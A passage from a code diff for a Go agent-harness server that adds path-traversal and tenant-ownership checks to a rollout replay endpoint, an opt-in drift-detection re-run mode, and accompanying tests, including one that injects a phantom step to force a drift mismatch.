+		for _, r := range got {
+			t.Errorf("cross-tenant search leak via %s: tenant B saw conversation %q (role=%q snippet=%q)",
+				path, r.ConversationID, r.Role, r.Snippet)
+		}
+	}
+
+	// Tenant B still finds their own content.
+	if got := f.search(t, f.tokenB, "/v1/conversations/search?q=pineapple"); len(got) == 0 {
+		t.Error("tenant B should find their own message containing pineapple")
+	}
+}

--- a/internal/server/http_replay.go
+++ b/internal/server/http_replay.go
@@ -1,12 +1,15 @@
 package server
 
 import (
+	"context"
 	"encoding/json"
 	"errors"
 	"fmt"
 	"net/http"
 	"os"
+	"path/filepath"
 	"strings"
+	"time"
 
 	"go-agent-harness/internal/forensics/replay"
 	"go-agent-harness/internal/forensics/rollout"
@@ -17,7 +20,12 @@ import (
 type replayRequest struct {
 	RolloutPath string `json:"rollout_path"`
 	Mode        string `json:"mode"`      // "simulate" | "fork"
-	ForkStep    int    `json:"fork_step"`  // required when mode=fork
+	ForkStep    int    `json:"fork_step"` // required when mode=fork
+	// DetectDrift opts the simulate path into the second (drift) layer of replay.
+	// When false or absent, simulate behaves exactly as before (integrity-only,
+	// offline). When true, simulate additionally re-runs the harness against the
+	// recorded-response provider and diffs the result. See handleReplaySimulate.
+	DetectDrift bool `json:"detect_drift"`
 }
 
 // handleRunReplay handles POST /v1/runs/replay.
@@ -41,9 +49,30 @@ func (s *Server) handleRunReplay(w http.ResponseWriter, r *http.Request) {
 		return
 	}
 
+	// SECURITY (PFIX-4): two-part gate, active only when auth is enabled AND a
+	// rollout dir is configured (auth-disabled / no-dir deployments are unchanged).
+	//
+	//  1. Path containment (read-safety): the caller-supplied rollout_path must
+	//     resolve — after symlink evaluation — to a location UNDER the configured
+	//     rollout dir. This rejects path traversal (../), absolute-path escapes,
+	//     and in-bounds symlinks whose target escapes the root, so the endpoint
+	//     can never read arbitrary server-side files.
+	//  2. Tenant ownership (enforced below, after the rollout is loaded): the
+	//     recorded run.started event carries the owning tenant_id, which must
+	//     match the caller's tenant. This is verified from rollout CONTENT rather
+	//     than by confining to a per-tenant directory the recorder never writes.
+	resolved, ok := s.resolveTenantRolloutPath(r, req.RolloutPath)
+	if !ok {
+		// 404 not_found: do not reveal whether the file exists or the on-disk
+		// directory structure (matches the by-ID unknown-resource contract).
+		writeError(w, http.StatusNotFound, "rollout_not_found", "rollout not found")
+		return
+	}
+	req.RolloutPath = resolved
+
 	switch req.Mode {
 	case "simulate":
-		s.handleReplaySimulate(w, req)
+		s.handleReplaySimulate(w, r, req)
 	case "fork":
 		s.handleReplayFork(w, r, req)
 	default:
@@ -52,23 +81,490 @@ func (s *Server) handleRunReplay(w http.ResponseWriter, r *http.Request) {
 	}
 }
 
+// replayTenantGateActive reports whether the per-tenant replay gate is active:
+// auth enabled AND a rollout dir configured. When inactive the legacy
+// (single-tenant / offline) behavior is preserved with no path or tenant checks.
+func (s *Server) replayTenantGateActive() bool {
+	return !s.authDisabled && strings.TrimSpace(s.rolloutDir) != ""
+}
+
+// verifyRolloutTenantOwnership enforces, when the gate is active, that the
+// loaded rollout's owning tenant (recorded in the run.started event's tenant_id)
+// matches the caller's authenticated tenant. Returns false (caller should emit
+// 404) on any mismatch. When the gate is inactive it always returns true.
+//
+// A rollout that predates the tenant_id field (no tenant_id in run.started) is
+// treated as un-ownable and therefore NOT replayable by any tenant while the
+// gate is active — fail closed rather than leak a possibly cross-tenant rollout.
+func (s *Server) verifyRolloutTenantOwnership(r *http.Request, events []rollout.RolloutEvent) bool {
+	if !s.replayTenantGateActive() {
+		return true
+	}
+	caller := strings.TrimSpace(TenantIDFromContext(r.Context()))
+	if caller == "" {
+		return false
+	}
+	owner := rolloutOwningTenant(events)
+	return owner != "" && owner == caller
+}
+
+// rolloutOwningTenant returns the tenant_id recorded on the rollout's
+// run.started event, or "" if absent/malformed. The loader guarantees
+// run.started is the first event when present, but we scan defensively.
+func rolloutOwningTenant(events []rollout.RolloutEvent) string {
+	for _, ev := range events {
+		if ev.Type != string(harness.EventRunStarted) {
+			continue
+		}
+		if ev.Payload == nil {
+			return ""
+		}
+		tid, _ := ev.Payload["tenant_id"].(string)
+		return strings.TrimSpace(tid)
+	}
+	return ""
+}
+
+// resolveTenantRolloutPath validates a caller-supplied rollout_path and returns
+// the cleaned, symlink-evaluated absolute path to load, plus true when it is
+// permitted.
+//
+// This is purely a READ-SAFETY containment check: the resolved path must stay
+// UNDER the configured rollout dir (the same directory the recorder writes to,
+// <RolloutDir>/<date>/<run_id>.jsonl) so that the endpoint can never read
+// arbitrary server-side files. It rejects path traversal (../), absolute-path
+// escapes, and in-bounds symlinks whose target escapes the root (via
+// filepath.EvalSymlinks followed by a re-check of containment).
+//
+// Tenant ownership is NOT enforced here — it is verified separately from the
+// loaded rollout's recorded tenant_id (see verifyRolloutTenantOwnership), which
+// lets legitimate same-tenant replays of real recorded rollouts succeed.
+//
+// The gate is inactive — and the path returned unchanged — when auth is
+// disabled or no rollout dir is configured, preserving legacy behavior for
+// single-tenant/offline deployments.
+func (s *Server) resolveTenantRolloutPath(r *http.Request, rolloutPath string) (string, bool) {
+	if !s.replayTenantGateActive() {
+		return rolloutPath, true
+	}
+
+	tenant := strings.TrimSpace(TenantIDFromContext(r.Context()))
+	if tenant == "" {
+		// Auth enabled with a rollout dir but no resolvable tenant: deny rather
+		// than fall through to an unscoped read.
+		return "", false
+	}
+
+	// textualRoot is the cleaned absolute rollout dir as written in config (no
+	// symlink evaluation). It anchors the pre-filesystem containment check that
+	// rejects ../ and absolute escapes.
+	textualRoot, err := filepath.Abs(s.rolloutDir)
+	if err != nil {
+		return "", false
+	}
+
+	// Resolve the requested path. Relative paths are interpreted against the
+	// rollout root so that callers may pass either a bare filename or a full path.
+	candidate := rolloutPath
+	if !filepath.IsAbs(candidate) {
+		candidate = filepath.Join(textualRoot, candidate)
+	}
+	abs, err := filepath.Abs(filepath.Clean(candidate))
+	if err != nil {
+		return "", false
+	}
+
+	// First containment check on the textual (cleaned) path against the textual
+	// root: rejects ../ and absolute escapes before touching the filesystem.
+	if !pathWithin(textualRoot, abs) {
+		return "", false
+	}
+
+	// Second containment check after evaluating symlinks: rejects an in-bounds
+	// symlink whose target escapes the root. Both sides are symlink-evaluated so
+	// the comparison is between fully-resolved paths (e.g. on macOS t.TempDir
+	// returns /var/... which is a symlink to /private/var/...). EvalSymlinks
+	// requires the path to exist; a non-existent path is a normal "not found" —
+	// return the in-bounds textual path so the loader produces a consistent
+	// not-found error rather than leaking the distinction.
+	evalRoot, err := filepath.EvalSymlinks(textualRoot)
+	if err != nil {
+		// A configured rollout dir that does not resolve is a server-side
+		// problem; deny rather than fall through to an unbounded read.
+		return "", false
+	}
+	evaluated, err := filepath.EvalSymlinks(abs)
+	if err != nil {
+		if os.IsNotExist(err) {
+			return abs, true
+		}
+		return "", false
+	}
+	if !pathWithin(evalRoot, evaluated) {
+		return "", false
+	}
+	return evaluated, true
+}
+
+// pathWithin reports whether target is the directory root itself or a path
+// nested inside it. It uses filepath.Rel and rejects any result that escapes
+// (starts with "..") or is absolute, which closes prefix-matching pitfalls such
+// as "/a/b" being treated as inside "/a/bc".
+func pathWithin(root, target string) bool {
+	rel, err := filepath.Rel(root, target)
+	if err != nil {
+		return false
+	}
+	if rel == "." {
+		return true
+	}
+	if rel == ".." || strings.HasPrefix(rel, ".."+string(filepath.Separator)) {
+		return false
+	}
+	return !filepath.IsAbs(rel)
+}
+
 // handleReplaySimulate runs an offline replay simulation.
-func (s *Server) handleReplaySimulate(w http.ResponseWriter, req replayRequest) {
+//
+// # Two-layer replay contract (deliverable E)
+//
+// Simulate has two layers, selected by the request's detect_drift flag:
+//
+//   - INTEGRITY (default; detect_drift false or absent): offline, no
+//     re-execution. replay.Replay verifies the internal causal consistency of
+//     the single recorded stream (matched=false means the stream is malformed or
+//     tampered, NOT that the harness drifted). The response shape is UNCHANGED
+//     from before drift detection existed: top-level mode/events_replayed/
+//     step_count/matched/mismatches, with NO drift or integrity sub-blocks.
+//     This default is regression-guarded by TestReplaySimulate_DefaultUnchanged.
+//
+//   - DRIFT (opt-in; detect_drift true): the integrity result is preserved under
+//     an "integrity" sub-block AND the harness is re-run against the recorded
+//     provider (replay.RecordedProvider) with tool execution short-circuited to
+//     the recorded outputs (replay.NewReplayToolHandler). Because every provider
+//     output and tool result is fixed to the original recording, the harness's
+//     own step/decision logic is the only live variable, so any divergence the
+//     diff finds is attributable to the harness. The response is
+//     {mode, matched, integrity:{...}, drift:{added_steps, removed_steps,
+//     changed_steps, divergent_tool_calls, cost_delta_usd, outcome_diff, score}}.
+//     Top-level matched = integrity.matched AND drift.matched. Cost is reported
+//     as a delta, never a hard mismatch (see replay.DetectDrift).
+//
+// The Issue-2 tenant/path gate stays in force for both layers: the path was
+// already resolved+verified by handleRunReplay before this is reached, and the
+// loaded rollout's tenant ownership is verified below before any replay work.
+func (s *Server) handleReplaySimulate(w http.ResponseWriter, r *http.Request, req replayRequest) {
 	events, err := loadRolloutFile(req.RolloutPath)
 	if err != nil {
 		writeRolloutError(w, err)
 		return
 	}
 
+	// SECURITY (PFIX-4): verify the loaded rollout is owned by the caller's
+	// tenant. 404 (not 403) to avoid revealing that the rollout exists.
+	if !s.verifyRolloutTenantOwnership(r, events) {
+		writeError(w, http.StatusNotFound, "rollout_not_found", "rollout not found")
+		return
+	}
+
 	result := replay.Replay(events)
 
+	// DEFAULT (integrity-only): response shape unchanged from before drift
+	// detection. Do not add any sub-block.
+	if !req.DetectDrift {
+		writeJSON(w, http.StatusOK, map[string]any{
+			"mode":            "simulate",
+			"events_replayed": len(result.Events),
+			"step_count":      result.StepCount,
+			"matched":         result.Matched,
+			"mismatches":      result.Mismatches,
+		})
+		return
+	}
+
+	// OPT-IN drift detection: keep the integrity result under "integrity" and
+	// add the drift result from a recorded-provider re-run.
+	drift, err := s.runDriftDetection(r.Context(), events)
+	if err != nil {
+		writeError(w, http.StatusInternalServerError, "replay_error",
+			fmt.Sprintf("drift detection failed: %s", err.Error()))
+		return
+	}
+
 	writeJSON(w, http.StatusOK, map[string]any{
-		"mode":            "simulate",
-		"events_replayed": len(result.Events),
-		"step_count":      result.StepCount,
-		"matched":         result.Matched,
-		"mismatches":      result.Mismatches,
+		"mode":    "simulate",
+		"matched": result.Matched && drift.Matched,
+		"integrity": map[string]any{
+			"events_replayed": len(result.Events),
+			"step_count":      result.StepCount,
+			"matched":         result.Matched,
+			"mismatches":      result.Mismatches,
+		},
+		"drift": map[string]any{
+			"added_steps":          drift.AddedSteps,
+			"removed_steps":        drift.RemovedSteps,
+			"changed_steps":        drift.ChangedSteps,
+			"divergent_tool_calls": drift.DivergentToolCalls,
+			"cost_delta_usd":       drift.CostDeltaUSD,
+			"outcome_diff":         drift.OutcomeDiff,
+			"score":                drift.Score,
+			"matched":              drift.Matched,
+		},
 	})
+}
+
+// runDriftDetection executes the drift layer: it builds the recorded-response
+// provider and replay tool dispatch from the loaded rollout, re-runs the harness
+// against them (recording into a temp dir), loads the resulting "replayed"
+// rollout, and diffs it against the original with replay.DetectDrift.
+//
+// The re-run uses a throwaway Runner — NOT s.runner — because s.runner is wired
+// to the live provider; drift detection must isolate the harness's own logic by
+// fixing every provider output and tool result to the original recording. The
+// temp RolloutDir and Runner are torn down before returning.
+func (s *Server) runDriftDetection(ctx context.Context, original []rollout.RolloutEvent) (replay.DriftResult, error) {
+	provider, err := replay.NewRecordedProvider(original)
+	if err != nil {
+		return replay.DriftResult{}, err
+	}
+
+	toolDispatch, err := replay.NewReplayToolDispatch(original)
+	if err != nil {
+		return replay.DriftResult{}, err
+	}
+
+	// Register every distinct recorded tool name with the replay handler so the
+	// re-run's tool calls resolve to the recorded outputs. Tools are marked
+	// non-parallel-safe so they execute sequentially and deterministically; the
+	// handler is keyed by call_id, so ordering does not affect the recorded result.
+	registry := harness.NewRegistry()
+	for _, name := range recordedToolNames(original) {
+		def := harness.ToolDefinition{
+			Name:         name,
+			Description:  "replay (recorded output)",
+			ParallelSafe: false,
+		}
+		if regErr := registry.Register(def, toolDispatch.Handler); regErr != nil {
+			return replay.DriftResult{}, fmt.Errorf("register replay tool %q: %w", name, regErr)
+		}
+	}
+
+	tempDir, err := os.MkdirTemp("", "replay-drift-*")
+	if err != nil {
+		return replay.DriftResult{}, fmt.Errorf("create temp rollout dir: %w", err)
+	}
+	defer os.RemoveAll(tempDir)
+
+	runner := harness.NewRunner(provider, registry, harness.RunnerConfig{
+		DefaultModel:        recordedModel(original),
+		DefaultSystemPrompt: recordedSystemPrompt(original),
+		// Cap the re-run at one more step than the original took: a faithful
+		// replay should reproduce the recorded step count, and the recorded
+		// provider errors once its scripted turns are exhausted, so an
+		// over-running harness fails fast rather than spinning.
+		MaxSteps:   recordedStepCount(original) + 1,
+		RolloutDir: tempDir,
+	})
+	defer runner.Shutdown(context.Background())
+
+	run, err := runner.StartRun(harness.RunRequest{
+		Prompt:       recordedPrompt(original),
+		SystemPrompt: recordedSystemPrompt(original),
+	})
+	if err != nil {
+		return replay.DriftResult{}, fmt.Errorf("start re-run: %w", err)
+	}
+
+	if err := waitForRunTerminal(ctx, runner, run.ID); err != nil {
+		return replay.DriftResult{}, err
+	}
+
+	replayed, err := loadCompletedRollout(ctx, tempDir, run.ID)
+	if err != nil {
+		return replay.DriftResult{}, err
+	}
+
+	return replay.DetectDrift(original, replayed, rollout.DriftOptions), nil
+}
+
+// loadCompletedRollout locates and loads the recorder's output for runID, polling
+// until the file exists, parses, and carries a terminal event. The rollout
+// recorder flushes asynchronously: the terminal EVENT can be delivered to
+// subscribers (so waitForRunTerminal returns) slightly before the recorder
+// goroutine drains its channel and writes the terminal LINE to disk. Reading the
+// file the instant the event fires therefore races and can observe a partial or
+// empty rollout. Polling for a terminal-terminated, parseable file closes that
+// race deterministically.
+func loadCompletedRollout(ctx context.Context, dir, runID string) ([]rollout.RolloutEvent, error) {
+	deadline := time.Now().Add(4 * time.Second)
+	var lastErr error
+	for {
+		path, err := findRolloutFile(dir, runID)
+		if err == nil {
+			events, loadErr := loadRolloutFile(path)
+			if loadErr == nil && rolloutHasTerminal(events) {
+				return events, nil
+			}
+			if loadErr != nil {
+				lastErr = loadErr
+			} else {
+				lastErr = fmt.Errorf("replayed rollout for run %s has no terminal event yet", runID)
+			}
+		} else {
+			lastErr = err
+		}
+
+		if time.Now().After(deadline) {
+			return nil, fmt.Errorf("load replayed rollout: %w", lastErr)
+		}
+		select {
+		case <-ctx.Done():
+			return nil, ctx.Err()
+		case <-time.After(10 * time.Millisecond):
+		}
+	}
+}
+
+// rolloutHasTerminal reports whether the events contain a terminal run event,
+// indicating the recorder has flushed the full run to disk.
+func rolloutHasTerminal(events []rollout.RolloutEvent) bool {
+	for _, ev := range events {
+		if harness.IsTerminalEvent(harness.EventType(ev.Type)) {
+			return true
+		}
+	}
+	return false
+}
+
+// waitForRunTerminal subscribes to the run and blocks until it reaches a terminal
+// event (completed/failed/cancelled) or ctx is done.
+func waitForRunTerminal(ctx context.Context, runner *harness.Runner, runID string) error {
+	history, stream, cancel, err := runner.Subscribe(runID)
+	if err != nil {
+		return fmt.Errorf("subscribe to re-run: %w", err)
+	}
+	defer cancel()
+
+	for _, ev := range history {
+		if harness.IsTerminalEvent(ev.Type) {
+			return nil
+		}
+	}
+	for {
+		select {
+		case ev, ok := <-stream:
+			if !ok {
+				return nil
+			}
+			if harness.IsTerminalEvent(ev.Type) {
+				return nil
+			}
+		case <-ctx.Done():
+			return ctx.Err()
+		}
+	}
+}
+
+// findRolloutFile locates the recorder's output for runID under dir
+// (<dir>/<date>/<runID>.jsonl). The date partition is chosen at record time, so
+// it is found by walking rather than assuming a date.
+func findRolloutFile(dir, runID string) (string, error) {
+	target := runID + ".jsonl"
+	var found string
+	err := filepath.Walk(dir, func(p string, info os.FileInfo, walkErr error) error {
+		if walkErr != nil || info.IsDir() {
+			return nil
+		}
+		if filepath.Base(p) == target {
+			found = p
+		}
+		return nil
+	})
+	if err != nil {
+		return "", fmt.Errorf("locate replayed rollout: %w", err)
+	}
+	if found == "" {
+		return "", fmt.Errorf("replayed rollout file for run %s not found", runID)
+	}
+	return found, nil
+}
+
+// recordedToolNames returns the distinct tool names referenced by the rollout's
+// tool.call.started events, in first-seen order.
+func recordedToolNames(events []rollout.RolloutEvent) []string {
+	seen := make(map[string]bool)
+	var names []string
+	for _, ev := range events {
+		if ev.Type != string(harness.EventToolCallStarted) || ev.Payload == nil {
+			continue
+		}
+		name, _ := ev.Payload["tool"].(string)
+		if name == "" || seen[name] {
+			continue
+		}
+		seen[name] = true
+		names = append(names, name)
+	}
+	return names
+}
+
+// recordedPrompt returns the prompt recorded on the rollout's run.started event,
+// or a non-empty placeholder so StartRun (which requires a prompt) succeeds.
+func recordedPrompt(events []rollout.RolloutEvent) string {
+	for _, ev := range events {
+		if ev.Type == string(harness.EventRunStarted) && ev.Payload != nil {
+			if p, ok := ev.Payload["prompt"].(string); ok && p != "" {
+				return p
+			}
+		}
+	}
+	return "replay"
+}
+
+// recordedSystemPrompt returns the system prompt recorded on run.started, if the
+// recorder captured one (real recorders typically do not; this is best-effort).
+func recordedSystemPrompt(events []rollout.RolloutEvent) string {
+	for _, ev := range events {
+		if ev.Type == string(harness.EventRunStarted) && ev.Payload != nil {
+			if p, ok := ev.Payload["system_prompt"].(string); ok {
+				return p
+			}
+		}
+	}
+	return ""
+}
+
+// recordedModel returns the model the original run used, so the re-run resolves
+// the same model in its provider.resolved event. The real recorder does not put
+// the model on run.started, but it does emit a provider.resolved event carrying
+// "model"; prefer that, falling back to run.started for hand-authored rollouts.
+func recordedModel(events []rollout.RolloutEvent) string {
+	for _, ev := range events {
+		if ev.Type == "provider.resolved" && ev.Payload != nil {
+			if m, ok := ev.Payload["model"].(string); ok && m != "" {
+				return m
+			}
+		}
+	}
+	for _, ev := range events {
+		if ev.Type == string(harness.EventRunStarted) && ev.Payload != nil {
+			if m, ok := ev.Payload["model"].(string); ok && m != "" {
+				return m
+			}
+		}
+	}
+	return ""
+}
+
+// recordedStepCount returns the highest step number in the rollout.
+func recordedStepCount(events []rollout.RolloutEvent) int {
+	maxStep := 0
+	for _, ev := range events {
+		if ev.Step > maxStep {
+			maxStep = ev.Step
+		}
+	}
+	return maxStep
 }
 
 // handleReplayFork reconstructs conversation history and starts a new run.
@@ -76,6 +572,13 @@ func (s *Server) handleReplayFork(w http.ResponseWriter, r *http.Request, req re
 	events, err := loadRolloutFile(req.RolloutPath)
 	if err != nil {
 		writeRolloutError(w, err)
+		return
+	}
+
+	// SECURITY (PFIX-4): verify the loaded rollout is owned by the caller's
+	// tenant before reconstructing/forking it. 404 to avoid revealing existence.
+	if !s.verifyRolloutTenantOwnership(r, events) {
+		writeError(w, http.StatusNotFound, "rollout_not_found", "rollout not found")
 		return
 	}
 

--- a/internal/server/http_replay_drift_test.go
+++ b/internal/server/http_replay_drift_test.go
@@ -1,0 +1,442 @@
+package server_test
+
+import (
+	"bufio"
+	"bytes"
+	"context"
+	"encoding/json"
+	"io"
+	"net/http"
+	"net/http/httptest"
+	"os"
+	"path/filepath"
+	"strings"
+	"testing"
+	"time"
+
+	"go-agent-harness/internal/fakeprovider"
+	"go-agent-harness/internal/harness"
+	"go-agent-harness/internal/server"
+)
+
+// driftFixture wires an auth-DISABLED server with a real rollout recorder, so a
+// real recorded rollout can be produced and then replayed with drift detection.
+// Auth-disabled keeps the focus on the drift pipeline (tenant gating has its own
+// suite in http_replay_tenant_test.go).
+type driftFixture struct {
+	ts         *httptest.Server
+	rolloutDir string
+	runner     *harness.Runner
+}
+
+// newDriftFixture builds a server backed by a fakeprovider whose scripted turn
+// makes the run complete in a single no-tool turn. A single-turn, no-tool run
+// produces the simplest possible rollout, which the drift re-run (recorded
+// provider) reproduces exactly.
+func newDriftFixture(t *testing.T) *driftFixture {
+	t.Helper()
+
+	rolloutDir := t.TempDir()
+
+	// A single no-tool turn that STREAMS its content and REPORTS usage, mirroring
+	// what a real provider (and the recorded-response provider in the drift
+	// re-run) produces. Matching streaming + usage_status keeps the re-run's
+	// rollout structurally identical to the original.
+	answer := "the one and only answer"
+	prov := fakeprovider.New([]fakeprovider.Turn{
+		{
+			Content: answer,
+			Deltas:  []harness.CompletionDelta{{Content: answer}},
+			Usage: &harness.CompletionUsage{
+				PromptTokens:     7,
+				CompletionTokens: 5,
+				TotalTokens:      12,
+			},
+			UsageStatus: harness.UsageStatusProviderReported,
+		},
+	})
+	runner := harness.NewRunner(
+		prov,
+		harness.NewRegistry(),
+		harness.RunnerConfig{
+			DefaultModel:        "test-model",
+			DefaultSystemPrompt: "test",
+			MaxSteps:            4,
+			RolloutDir:          rolloutDir,
+		},
+	)
+
+	h := server.NewWithOptions(server.ServerOptions{
+		Runner:       runner,
+		RolloutDir:   rolloutDir,
+		AuthDisabled: true,
+	})
+	ts := httptest.NewServer(h)
+	t.Cleanup(func() {
+		ts.Close()
+		runner.Shutdown(context.Background())
+	})
+
+	return &driftFixture{ts: ts, rolloutDir: rolloutDir, runner: runner}
+}
+
+// recordRollout drives a real run through the HTTP API, waits for completion,
+// and returns the on-disk path of the recorded rollout file.
+func (f *driftFixture) recordRollout(t *testing.T, prompt string) string {
+	t.Helper()
+
+	b, _ := json.Marshal(map[string]any{"prompt": prompt})
+	resp, err := http.Post(f.ts.URL+"/v1/runs", "application/json", bytes.NewReader(b))
+	if err != nil {
+		t.Fatalf("POST /v1/runs: %v", err)
+	}
+	var created struct {
+		RunID string `json:"run_id"`
+	}
+	_ = json.NewDecoder(resp.Body).Decode(&created)
+	_ = resp.Body.Close()
+	if created.RunID == "" {
+		t.Fatalf("POST /v1/runs returned no run_id")
+	}
+
+	f.waitForDone(t, created.RunID)
+
+	// Poll until the rollout file both exists AND contains a terminal event
+	// (run.completed or run.failed). The recorder writes asynchronously, so
+	// the HTTP status reaching "completed" does not guarantee the terminal
+	// line has been flushed to disk yet. Reading the file before the terminal
+	// line is written causes injectPhantomStep to see no run.completed, leave
+	// terminalStep=0, and inject a phantom llm.turn.completed with step=0,
+	// which the loader then rejects as invalid.
+	var found string
+	deadline := time.Now().Add(4 * time.Second)
+	for time.Now().Before(deadline) {
+		_ = filepath.Walk(f.rolloutDir, func(p string, info os.FileInfo, err error) error {
+			if err != nil || info.IsDir() {
+				return nil
+			}
+			if filepath.Base(p) == created.RunID+".jsonl" {
+				found = p
+			}
+			return nil
+		})
+		if found != "" && rolloutFileHasTerminal(found) {
+			break
+		}
+		found = "" // reset: file exists but terminal not yet written
+		time.Sleep(10 * time.Millisecond)
+	}
+	if found == "" {
+		t.Fatalf("recorded rollout file for run %s not found (or has no terminal event) under %s", created.RunID, f.rolloutDir)
+	}
+	return found
+}
+
+func (f *driftFixture) waitForDone(t *testing.T, runID string) {
+	t.Helper()
+	deadline := time.Now().Add(4 * time.Second)
+	for {
+		resp, err := http.Get(f.ts.URL + "/v1/runs/" + runID)
+		if err != nil {
+			t.Fatalf("GET /v1/runs/%s: %v", runID, err)
+		}
+		var state struct {
+			Status string `json:"status"`
+		}
+		_ = json.NewDecoder(resp.Body).Decode(&state)
+		_ = resp.Body.Close()
+		if state.Status == "completed" || state.Status == "failed" {
+			return
+		}
+		if time.Now().After(deadline) {
+			t.Fatalf("timed out waiting for run %s (last status %q)", runID, state.Status)
+		}
+		time.Sleep(10 * time.Millisecond)
+	}
+}
+
+// rolloutFileHasTerminal reports whether the JSONL rollout file at path
+// contains at least one run.completed or run.failed event. It is used by
+// recordRollout to confirm the recorder has flushed the terminal line to disk
+// before returning the path for subsequent manipulation by injectPhantomStep.
+func rolloutFileHasTerminal(path string) bool {
+	data, err := os.ReadFile(path)
+	if err != nil {
+		return false
+	}
+	sc := bufio.NewScanner(strings.NewReader(string(data)))
+	for sc.Scan() {
+		var ev struct {
+			Type string `json:"type"`
+		}
+		if json.Unmarshal(sc.Bytes(), &ev) == nil {
+			if ev.Type == "run.completed" || ev.Type == "run.failed" {
+				return true
+			}
+		}
+	}
+	return false
+}
+
+func (f *driftFixture) simulate(t *testing.T, body map[string]any) (int, map[string]any) {
+	t.Helper()
+	b, _ := json.Marshal(body)
+	resp, err := http.Post(f.ts.URL+"/v1/runs/replay", "application/json", bytes.NewReader(b))
+	if err != nil {
+		t.Fatalf("POST /v1/runs/replay: %v", err)
+	}
+	defer resp.Body.Close()
+	raw, _ := io.ReadAll(resp.Body)
+	var out map[string]any
+	if len(raw) > 0 {
+		_ = json.Unmarshal(raw, &out)
+	}
+	return resp.StatusCode, out
+}
+
+// TestReplaySimulate_DetectDrift_StableFixtureMatches is T-F3a: POST simulate with
+// detect_drift:true on a real recorded rollout returns a drift block, and an
+// identical re-run (recorded provider + recorded tool outputs) reports
+// matched=true with zero added/removed/changed steps.
+func TestReplaySimulate_DetectDrift_StableFixtureMatches(t *testing.T) {
+	t.Parallel()
+
+	f := newDriftFixture(t)
+	path := f.recordRollout(t, "what is the answer")
+
+	code, out := f.simulate(t, map[string]any{
+		"rollout_path": path,
+		"mode":         "simulate",
+		"detect_drift": true,
+	})
+	if code != http.StatusOK {
+		t.Fatalf("detect_drift simulate: got %d, want 200; body %+v", code, out)
+	}
+
+	if out["mode"] != "simulate" {
+		t.Errorf("mode: got %v, want simulate", out["mode"])
+	}
+
+	// Integrity block is still present (the existing offline replay result).
+	integ, ok := out["integrity"].(map[string]any)
+	if !ok {
+		t.Fatalf("expected integrity block, got %+v", out["integrity"])
+	}
+	if integ["matched"] != true {
+		t.Errorf("integrity.matched: got %v, want true", integ["matched"])
+	}
+
+	// Drift block must be present with the contract's fields.
+	drift, ok := out["drift"].(map[string]any)
+	if !ok {
+		t.Fatalf("expected drift block, got %+v", out["drift"])
+	}
+	if drift["matched"] != true {
+		t.Errorf("drift.matched: got %v, want true (identical re-run). full drift: %+v", drift["matched"], drift)
+	}
+	if drift["outcome_diff"] != "identical" {
+		t.Errorf("drift.outcome_diff: got %v, want identical", drift["outcome_diff"])
+	}
+	for _, key := range []string{"added_steps", "removed_steps", "changed_steps"} {
+		if v, present := drift[key]; present && v != nil {
+			if arr, isArr := v.([]any); isArr && len(arr) != 0 {
+				t.Errorf("drift.%s: expected empty, got %v", key, arr)
+			}
+		}
+	}
+	// cost_delta_usd and score must be present.
+	if _, present := drift["cost_delta_usd"]; !present {
+		t.Errorf("drift.cost_delta_usd missing")
+	}
+	if _, present := drift["score"]; !present {
+		t.Errorf("drift.score missing")
+	}
+
+	// Top-level matched == integrity.matched AND drift.matched.
+	if out["matched"] != true {
+		t.Errorf("top-level matched: got %v, want true", out["matched"])
+	}
+}
+
+// TestReplaySimulate_DefaultUnchanged is T-F3b: a default simulate request (no
+// detect_drift) returns the SAME shape as before the drift feature: top-level
+// integrity fields, NO drift block, NO integrity block.
+func TestReplaySimulate_DefaultUnchanged(t *testing.T) {
+	t.Parallel()
+
+	f := newDriftFixture(t)
+	path := f.recordRollout(t, "the default path")
+
+	code, out := f.simulate(t, map[string]any{
+		"rollout_path": path,
+		"mode":         "simulate",
+	})
+	if code != http.StatusOK {
+		t.Fatalf("default simulate: got %d, want 200; body %+v", code, out)
+	}
+
+	if out["mode"] != "simulate" {
+		t.Errorf("mode: got %v, want simulate", out["mode"])
+	}
+	// The original integrity-only fields must remain at the top level.
+	if out["matched"] != true {
+		t.Errorf("matched: got %v, want true", out["matched"])
+	}
+	if _, present := out["events_replayed"]; !present {
+		t.Errorf("events_replayed missing (default shape regressed)")
+	}
+	if _, present := out["step_count"]; !present {
+		t.Errorf("step_count missing (default shape regressed)")
+	}
+	if _, present := out["mismatches"]; !present {
+		t.Errorf("mismatches missing (default shape regressed)")
+	}
+
+	// No drift / integrity sub-block must be added when detect_drift is absent.
+	if _, present := out["drift"]; present {
+		t.Errorf("default request must NOT include a drift block, got %v", out["drift"])
+	}
+	if _, present := out["integrity"]; present {
+		t.Errorf("default request must NOT include an integrity block, got %v", out["integrity"])
+	}
+}
+
+// injectPhantomStep reads the JSONL rollout file at path, inserts a phantom
+// "llm.turn.completed" event at an extra step number just before the terminal
+// run.completed/run.failed line, and writes the modified file back to disk.
+// This makes the "original" appear to have an extra LLM turn that the drift
+// re-run (which replays only the real scripted turns) will NOT produce, so
+// drift detection must report matched=false with non-empty removed_steps.
+//
+// The on-disk JSONL format is {"ts":"...","seq":N,"type":"...","data":{...}}.
+func injectPhantomStep(t *testing.T, path string) {
+	t.Helper()
+
+	raw, err := os.ReadFile(path)
+	if err != nil {
+		t.Fatalf("injectPhantomStep: read %s: %v", path, err)
+	}
+
+	// Parse lines into raw JSON objects to find the terminal event and the
+	// highest step number seen so far.
+	type rawLine struct {
+		Ts   string         `json:"ts"`
+		Seq  uint64         `json:"seq"`
+		Type string         `json:"type"`
+		Data map[string]any `json:"data"`
+	}
+
+	var lines []rawLine
+	sc := bufio.NewScanner(strings.NewReader(string(raw)))
+	for sc.Scan() {
+		text := strings.TrimSpace(sc.Text())
+		if text == "" {
+			continue
+		}
+		var rl rawLine
+		if err := json.Unmarshal([]byte(text), &rl); err != nil {
+			t.Fatalf("injectPhantomStep: parse line %q: %v", text, err)
+		}
+		lines = append(lines, rl)
+	}
+	if err := sc.Err(); err != nil {
+		t.Fatalf("injectPhantomStep: scan: %v", err)
+	}
+
+	// Find the terminal event (run.completed or run.failed) and its step number.
+	insertIdx := len(lines) // default: append (shouldn't happen on valid rollout)
+	terminalStep := 0
+	for i, l := range lines {
+		if l.Type == "run.completed" || l.Type == "run.failed" {
+			insertIdx = i
+			if s, ok := l.Data["step"].(float64); ok {
+				terminalStep = int(s)
+			}
+			break
+		}
+	}
+	// Use the terminal step so the injected line is non-decreasing with
+	// the lines before it (the loader rejects decreasing step numbers).
+	phantomStep := terminalStep
+
